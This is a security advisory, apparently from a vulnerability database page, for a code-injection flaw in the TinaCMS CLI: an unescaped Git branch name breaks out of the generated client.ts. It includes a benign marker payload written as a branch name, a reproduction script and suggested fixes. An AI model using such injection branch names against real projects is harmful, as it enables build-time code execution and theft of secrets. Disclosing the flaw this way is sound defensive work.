GHSA-PWHX-CVV3-QJ5C
Vulnerability from github – Published: 2026-10-09 20:56 – Updated: 2026-10-09 20:56Summary
@tinacms/cli inserts the raw Git branch value into the generated client.ts source without escaping or encoding. A Git-valid branch name can close the string literal and inject an arbitrary JavaScript expression that executes when the consumer build imports the generated client module.
Affected component
- Source (branch read):
packages/@tinacms/cli/src/cmds/init/templates/config.tslines 155–172 — readsVERCEL_GIT_COMMIT_REF,GITHUB_BRANCH, orHEADintoconfig.branch - Transform (URL build):
packages/@tinacms/cli/src/next/codegen/index.tslines 219–253 —_createApiUrl()concatenates the raw branch into the API URL with noencodeURIComponent - Sink (template):
packages/@tinacms/cli/src/next/codegen/index.tslines 363–381 —genClient()interpolates the URL intourl: '${apiURL}' - Sibling sink:
packages/@tinacms/cli/src/next/codegen/codegen/plugin.tsline 55 —url: "${apiURL}"(same pattern, double quotes)
Root cause
The codegen template at index.ts:376 uses:
url: '${apiURL}'
where apiURL contains the raw branch name. No JSON.stringify, encodeURIComponent, or string-escape function is applied at any point in the pipeline. A single quote in the branch name closes the string literal and allows expression injection.
Payload
The following is a valid Git branch name (git check-ref-format accepts it):
x'+(globalThis.__TINA_PROBE='hit')+'
Generated source (sink)
When codegen runs with this branch, the generated client.ts contains:
export const client = createClient({
url: 'https://content.tinajs.io/2.4/content/<clientId>/github/x'+(globalThis.__TINA_PROBE='hit')+'',
token: '<token>',
queries,
});
The ' in the branch name closes the URL string. +(globalThis.__TINA_PROBE='hit')+ is parsed as a JavaScript expression. The trailing +' reopens a string to keep the syntax valid.
Steps to reproduce
Prerequisites: Node.js, Git, npm
mkdir /tmp/tinacms-repro && cd /tmp/tinacms-repro
git init && git commit --allow-empty -m "init"
git branch "x'+(globalThis.__TINA_PROBE='hit')+'"
npm init -y && npm install esbuild
Create repro.mjs:
import { transform } from 'esbuild';
import vm from 'vm';
// Simulate VERCEL_GIT_COMMIT_REF containing the malicious branch
const branch = "x'+(globalThis.__TINA_PROBE='hit')+'";
// _createApiUrl() logic from index.ts:252
const apiURL = `https://content.tinajs.io/2.4/content/my-client/github/${branch}`;
// genClient() template from index.ts:376
const generated = `
import { createClient } from "tinacms/dist/client";
export const client = createClient({ url: '${apiURL}', token: 'xxx' });
`;
console.log("Generated source:\n", generated);
// Compile (same as consumer build)
const compiled = await transform(generated, { loader: 'ts', format: 'cjs' });
// Execute in sandboxed VM
const sandbox = {
globalThis: {},
module: { exports: {} },
exports: {},
require: () => ({ createClient: (o) => o }),
};
vm.createContext(sandbox);
vm.runInContext(compiled.code, sandbox);
console.log("__TINA_PROBE =", sandbox.globalThis.__TINA_PROBE);
// Output: __TINA_PROBE = hit
Run: node repro.mjs
Result: globalThis.__TINA_PROBE is set to 'hit', confirming the injected expression executed during module evaluation.
Negative control: Repeating with branch = "feature/safe-branch" does not trigger injection.
Impact
The injected expression executes with the full privileges of the consumer build process. In a typical Vercel or GitHub Actions preview deployment:
- Build environment variables are accessible (
process.env), which may includeNPM_TOKEN,VERCEL_TOKEN, cloud provider secrets, and API keys - Build artifacts can be modified, enabling supply-chain compromise of the deployed output
- Network access is available to exfiltrate data
Attack scenario: An attacker opens a pull request to any open-source project that uses TinaCMS with preview deployments enabled (Vercel auto-deploys every PR branch). The attacker's branch name contains the payload. The preview build runs Tina codegen, generates the injected client.ts, and the attacker's code executes during the build.
Preconditions:
1. Attacker can create a branch or PR that triggers a consumer build
2. Consumer uses TinaCMS with the scaffolded branch config (reading from VERCEL_GIT_COMMIT_REF or equivalent)
3. Tina SDK codegen is enabled (default)
Severity rationale
High — build-time arbitrary code execution via a controlled Git ref. Critical was not claimed because no real secret exfiltration or release artifact tampering was demonstrated in this proof; only a benign marker was used.
Suggested fix
- Use
JSON.stringify(value)to safely serialize any runtime value interpolated into generated source templates - Apply
encodeURIComponent()to the branch value before constructing the API URL path segment - Apply the same treatment to
apiURL,token,errorPolicy,cacheDir, and the siblingAddGeneratedClientFunctemplate inplugin.ts - Consider moving runtime values out of source templates entirely — pass them through a JSON config file that the generated client reads at runtime
Related advisory
GHSA-4936-9hrh-qqpw — TinaCMS Forestry migration generated-source RCE. Different source (Forestry YAML labels), different parser (__TINA_INTERNAL__ unquoting helper), and different sink (tina/templates.ts). This report is not a duplicate.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.7.0"
},
"package": {
"ecosystem": "npm",
"name": "@tinacms/cli"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-108259"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-09T20:56:52Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`@tinacms/cli` inserts the raw Git branch value into the generated `client.ts` source without escaping or encoding. A Git-valid branch name can close the string literal and inject an arbitrary JavaScript expression that executes when the consumer build imports the generated client module.\n\n### Affected component\n\n- **Source (branch read):** `packages/@tinacms/cli/src/cmds/init/templates/config.ts` lines 155\u2013172 \u2014 reads `VERCEL_GIT_COMMIT_REF`, `GITHUB_BRANCH`, or `HEAD` into `config.branch`\n- **Transform (URL build):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 219\u2013253 \u2014 `_createApiUrl()` concatenates the raw branch into the API URL with no `encodeURIComponent`\n- **Sink (template):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 363\u2013381 \u2014 `genClient()` interpolates the URL into `url: \u0027${apiURL}\u0027`\n- **Sibling sink:** `packages/@tinacms/cli/src/next/codegen/codegen/plugin.ts` line 55 \u2014 `url: \"${apiURL}\"` (same pattern, double quotes)\n\n### Root cause\n\nThe codegen template at `index.ts:376` uses:\n\n```ts\nurl: \u0027${apiURL}\u0027\n```\n\nwhere `apiURL` contains the raw branch name. No `JSON.stringify`, `encodeURIComponent`, or string-escape function is applied at any point in the pipeline. A single quote in the branch name closes the string literal and allows expression injection.\n\n### Payload\n\nThe following is a valid Git branch name (`git check-ref-format` accepts it):\n\n```\nx\u0027+(globalThis.__TINA_PROBE=\u0027hit\u0027)+\u0027\n```\n\n### Generated source (sink)\n\nWhen codegen runs with this branch, the generated `client.ts` contains:\n\n```ts\nexport const client = createClient({\n url: \u0027https://content.tinajs.io/2.4/content/\u003cclientId\u003e/github/x\u0027+(globalThis.__TINA_PROBE=\u0027hit\u0027)+\u0027\u0027,\n token: \u0027\u003ctoken\u003e\u0027,\n queries,\n});\n```\n\nThe `\u0027` in the branch name closes the URL string. `+(globalThis.__TINA_PROBE=\u0027hit\u0027)+` is parsed as a JavaScript expression. The trailing `+\u0027` reopens a string to keep the syntax valid.\n\n### Steps to reproduce\n\n**Prerequisites:** Node.js, Git, npm\n\n```bash\nmkdir /tmp/tinacms-repro \u0026\u0026 cd /tmp/tinacms-repro\ngit init \u0026\u0026 git commit --allow-empty -m \"init\"\ngit branch \"x\u0027+(globalThis.__TINA_PROBE=\u0027hit\u0027)+\u0027\"\nnpm init -y \u0026\u0026 npm install esbuild\n```\n\nCreate `repro.mjs`:\n\n```js\nimport { transform } from \u0027esbuild\u0027;\nimport vm from \u0027vm\u0027;\n\n// Simulate VERCEL_GIT_COMMIT_REF containing the malicious branch\nconst branch = \"x\u0027+(globalThis.__TINA_PROBE=\u0027hit\u0027)+\u0027\";\n\n// _createApiUrl() logic from index.ts:252\nconst apiURL = `https://content.tinajs.io/2.4/content/my-client/github/${branch}`;\n\n// genClient() template from index.ts:376\nconst generated = `\nimport { createClient } from \"tinacms/dist/client\";\nexport const client = createClient({ url: \u0027${apiURL}\u0027, token: \u0027xxx\u0027 });\n`;\n\nconsole.log(\"Generated source:\\n\", generated);\n\n// Compile (same as consumer build)\nconst compiled = await transform(generated, { loader: \u0027ts\u0027, format: \u0027cjs\u0027 });\n\n// Execute in sandboxed VM\nconst sandbox = {\n globalThis: {},\n module: { exports: {} },\n exports: {},\n require: () =\u003e ({ createClient: (o) =\u003e o }),\n};\nvm.createContext(sandbox);\nvm.runInContext(compiled.code, sandbox);\n\nconsole.log(\"__TINA_PROBE =\", sandbox.globalThis.__TINA_PROBE);\n// Output: __TINA_PROBE = hit\n```\n\nRun: `node repro.mjs`\n\n**Result:** `globalThis.__TINA_PROBE` is set to `\u0027hit\u0027`, confirming the injected expression executed during module evaluation.\n\n**Negative control:** Repeating with `branch = \"feature/safe-branch\"` does not trigger injection.\n\n### Impact\n\nThe injected expression executes with the full privileges of the consumer build process. In a typical Vercel or GitHub Actions preview deployment:\n\n- **Build environment variables** are accessible (`process.env`), which may include `NPM_TOKEN`, `VERCEL_TOKEN`, cloud provider secrets, and API keys\n- **Build artifacts** can be modified, enabling supply-chain compromise of the deployed output\n- **Network access** is available to exfiltrate data\n\n**Attack scenario:** An attacker opens a pull request to any open-source project that uses TinaCMS with preview deployments enabled (Vercel auto-deploys every PR branch). The attacker\u0027s branch name contains the payload. The preview build runs Tina codegen, generates the injected `client.ts`, and the attacker\u0027s code executes during the build.\n\n**Preconditions:**\n1. Attacker can create a branch or PR that triggers a consumer build\n2. Consumer uses TinaCMS with the scaffolded branch config (reading from `VERCEL_GIT_COMMIT_REF` or equivalent)\n3. Tina SDK codegen is enabled (default)\n\n### Severity rationale\n\n**High** \u2014 build-time arbitrary code execution via a controlled Git ref. Critical was not claimed because no real secret exfiltration or release artifact tampering was demonstrated in this proof; only a benign marker was used.\n\n### Suggested fix\n\n1. Use `JSON.stringify(value)` to safely serialize any runtime value interpolated into generated source templates\n2. Apply `encodeURIComponent()` to the branch value before constructing the API URL path segment\n3. Apply the same treatment to `apiURL`, `token`, `errorPolicy`, `cacheDir`, and the sibling `AddGeneratedClientFunc` template in `plugin.ts`\n4. Consider moving runtime values out of source templates entirely \u2014 pass them through a JSON config file that the generated client reads at runtime\n\n### Related advisory\n\n[GHSA-4936-9hrh-qqpw](https://github.com/advisories/GHSA-4936-9hrh-qqpw) \u2014 TinaCMS Forestry migration generated-source RCE. Different source (Forestry YAML labels), different parser (`__TINA_INTERNAL__` unquoting helper), and different sink (`tina/templates.ts`). This report is not a duplicate.",
"id": "GHSA-pwhx-cvv3-qj5c",
"modified": "2026-10-09T20:56:52Z",
"published": "2026-10-09T20:56:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-pwhx-cvv3-qj5c"
},
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/pull/7526"
},
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/commit/d030d414d39e15de79bf36e4c728d57205e71dde"
},
{
"type": "PACKAGE",
"url": "https://github.com/tinacms/tinacms"
},
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/releases/tag/@tinacms/cli@3.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Tina: Code injection via unescaped Git branch name in generated client source"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
Browse all ATT&CK techniques and the vulnerabilities related to each.
Related by attack behaviour
Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.